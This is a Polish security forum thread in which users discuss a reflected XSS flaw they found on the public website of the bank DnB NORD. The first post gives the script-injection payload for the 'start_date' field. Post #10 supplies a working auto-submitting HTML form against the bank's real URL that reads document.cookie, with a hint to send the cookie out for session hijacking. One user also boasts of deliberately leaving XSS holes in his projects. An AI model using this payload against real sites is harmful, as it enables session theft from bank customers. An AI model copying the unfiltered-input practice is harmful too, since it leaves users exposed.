Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 11

Temat: bang bank...

  1. #1
    Zarejestrowany
    Jan 2011
    Postów
    65

    Domyślnie bang bank...

    wchodzimy na stronę DnB NORD
    na dole strony mamy "Wybierz dzień" i jego śliczne aż proszące się o sprawdzenie pole "input". Więc input (via data tamper):
    $start_date="><script>alert('hakujemy')</script>

    Co z tym można zrobić dalej - pozostawiam w kwestii domysłu ;-)

  2. #2
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    Cytat Napisał testujemy Zobacz post
    Co z tym można zrobić dalej - pozostawiam w kwestii domysłu ;-)
    nic specjalnego, zwykly xss to prawie niegrozna forma "ataku".
    War, war never changes.

  3. #3
    Zarejestrowany
    Jan 2011
    Postów
    65

    Domyślnie

    Od 8 lat wykonuję pentesty dla rządu, instytucji finansowych, korporacji i firm soho. XSS jest krytyczną luką w bezpieczeństwie. Możesz się oczywiście nie zgodzić i nie czytać o phishingu, csrf'ach i bugach w przeglądarkach. Tak samo jak o budowaniu payloadów do XSSów.

    I oby kolego wszystkie banki miały takie bugi ;-)

    Pozdrawiam

  4. #4
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Zadziornie zapytam - persistent/reflected?
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  5. #5
    Zarejestrowany
    Jan 2011
    Postów
    65

    Domyślnie

    stety niestety reflected, ale w dobie 'kliknij nowa gre fejsbuka' albo 'focie paris hildon' skuteczne.
    poza tym mysle, ze skoro dali czadu w kwestii podstawowo sprawdzanych pol wejsciowych, to tylko poymslec jakie kwiatki tam jeszcze czekaja ;-)

    update:
    wrzuciłem kod wyświetlony przez 'pokaż źródło' z googla do tego parametru i mamy nowości ;-)
    1. nie ma ograniczenia co do ilosci linii wrzucanego kodu
    2. nie ma ogranicznikow dla script, etc...
    3. po uzyciu data tamper na tej stronie (i wklejeniu kodu Google) data tamper pieknie traktuje parametry googlowe, jako dnbnorda ;-P
    zabawnie...
    4. bo zapomnialem ale chyba raczej wczesniejsze pkty to uwzgledniaja: wrzucanie tresci (jpg,etc) z zew. serwerow tez na luzie wchodzi w gre
    Ostatnio edytowane przez testujemy : 01-24-2011 - 14:55

  6. #6
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Ohhh fsck
    Fajny ten poniedzialek lol
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  7. #7
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    Cytat Napisał testujemy Zobacz post
    Możesz się oczywiście nie zgodzić i nie czytać o phishingu, csrf'ach i bugach w przeglądarkach.
    jasne ze sie nie zgodze, codzien wykrywanych jest (zeby nie powiedziec, "mamy") wiele xssow na popularnych stronach duzych firm i jakos nie jest o tym glosno, a mowiac ze atak jest malo grozny mam na mysli bank a nie jego klientow. phishing mozesz zrobic wszedzie, jak user glupi i nieswiadomy to zawsze kliknie.
    War, war never changes.

  8. #8
    Zarejestrowany
    Nov 2009
    Postów
    643

    Domyślnie

    Ostatnio w swoich projektach zostawiam XSSy typu 'reflected'.
    Po prostu szkoda mi wydajności na częstą filtrację danych..
    Oczywiście trzeba wiedzieć co się robi, jeden nieuważny krok i można mieć problem.
    światło mądrości oświetla drogę z nikąd do nikąd

  9. #9
    Zarejestrowany
    Jan 2011
    Postów
    65

    Domyślnie

    GCG-9, i co dalej? Bo chciałbym zaproponować ci przyjrzenie się kilku tematom, mianowicie:
    scena rosyjska + banki. Kto wie ten wie o co chodzi. Jeśli nie wiesz, gorąco zachęcam do googla na ten temat.

    Ponadto, przyjemnie się czyta więc dorzucam:
    http://www.portcullis-security.com/u...Tunnelling.pdf
    XSS – Exploitation beyond alert(‘xss’) | Security Reliks
    i-Xploit: XSS Shell v0.3.9 – Cross Site Scripting Backdoor Tool

    Nie mam potrzeby rozwodzić się nad tym w ilu procentach jest to super hiper krytyczna luka. Fakt jest taki, że w banku komuś dobrze płacą za bycie czepliwym, podejrzliwym i wnikliwym, tak jak płaci się przestępcom za wykradanie danych. Tutaj admin się nie popisał, przeoczył tą sprawę, mimo kontaktem z bankiem.

    Słyszałem kiedyś, że każdy lubi ryzyko, jednak trzymanie hajsu w banku, który 'reflected zostawia w projektach' to słaby pomysł moim zdnaiem ;-)

    Swoją drogą, ciekawe, jakby przeklikać całą witrynę banku co jeszcze by tam siedziało, może backup.old

  10. #10
    Zarejestrowany
    Nov 2009
    Postów
    643

    Domyślnie

    Poprawka, ta luka jest potencjalnie groźna, można przy jej pomocy przechwycić sesję,
    wystarczy że atakujący zwabi ofiarę na stronę z poniższym kodem html/js

    Kod html:
    <form action="http://www.dnbnord.pl/pl/tabela-kursow-walut-dla-kredytow/go:archiwum/#arch" method="post">
    <input name="start_date" value="<script>alert(document.cookie)</script>" type="hidden"/>
    <input type="submit"/>
    </form>
    <script>
    	document.forms[0].submit()
    </script>
    oczywiście zamiast alert(document.cookie) robimy coś konstruktywniejszego, np. tworzymy i wysłamy formularz z owym stringiem document.cookie...
    światło mądrości oświetla drogę z nikąd do nikąd

Strona 1 z 2 12 OstatniOstatni

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj